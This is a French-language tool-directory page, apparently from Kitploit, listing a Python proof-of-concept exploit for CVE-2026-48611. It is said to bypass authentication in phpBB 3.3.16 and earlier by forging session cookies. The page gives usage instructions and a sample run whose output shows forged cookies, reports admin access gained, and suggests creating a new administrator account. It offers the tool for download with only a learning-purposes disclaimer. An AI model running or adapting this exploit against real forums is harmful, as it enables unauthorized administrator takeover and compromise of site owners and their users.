Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-48611-phpBB — Preuve de concept en Python qui contourne l'authentification dans phpBB 3.3.16 et versions antérieures en falsifiant les cookies de session pour obtenir un accès administrateur. | Kitploit
Outils/GitHubGitHub/lxdwnpiper/cve-2026-48611-phpbb
Attaques de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionAuthentification
GitHub

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
lxdwnpiper/cve-2026-48611-phpbb

CVE-2026-48611-phpBB

Preuve de concept en Python qui contourne l'authentification dans phpBB 3.3.16 et versions antérieures en falsifiant les cookies de session pour obtenir un accès administrateur.

Voir le dépôt
il y a 3 moisPas encore vérifié

CVE-2026-48611-phpBB

Contournement d'authentification

poc simple de contournement d'authentification ; si vous souhaitez y accéder via un navigateur, n'oubliez pas de modifier la variable USER_AGENT dans le script en fonction de ce qui est affiché dans votre navigateur pour que cela fonctionne. utilisez un éditeur de cookies pour remplacer la valeur *_sid et *_u

Affecté : phpBB 3.3.16 et versions antérieures + 4.0.0-a2

phpbb  python3 exploit.py https://localhost:8000 joushk
[+] Target:  https://localhost:8000
[+] Target username: joushk
[+] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36

[+] Session cookies obtained:
    phpbb3_cl7ge_u: 2
    phpbb3_cl7ge_k: 
    phpbb3_cl7ge_sid: 4823a1ffeea59187eb31be1809ec0fd3
[+] User ID: 2
[!] User ID is 2 – default admin account.

[!] EXPLOIT SUCCESSFUL!
[!] You now have admin access.
[!] Note: ACP may still ask for password if re-authentication is enabled.
[+] tips: new create user and add to administrator group using bypass account auth and login to ACP Successd

[!!!Ce script est uniquement à des fins d'apprentissage]

Télécharger l’outil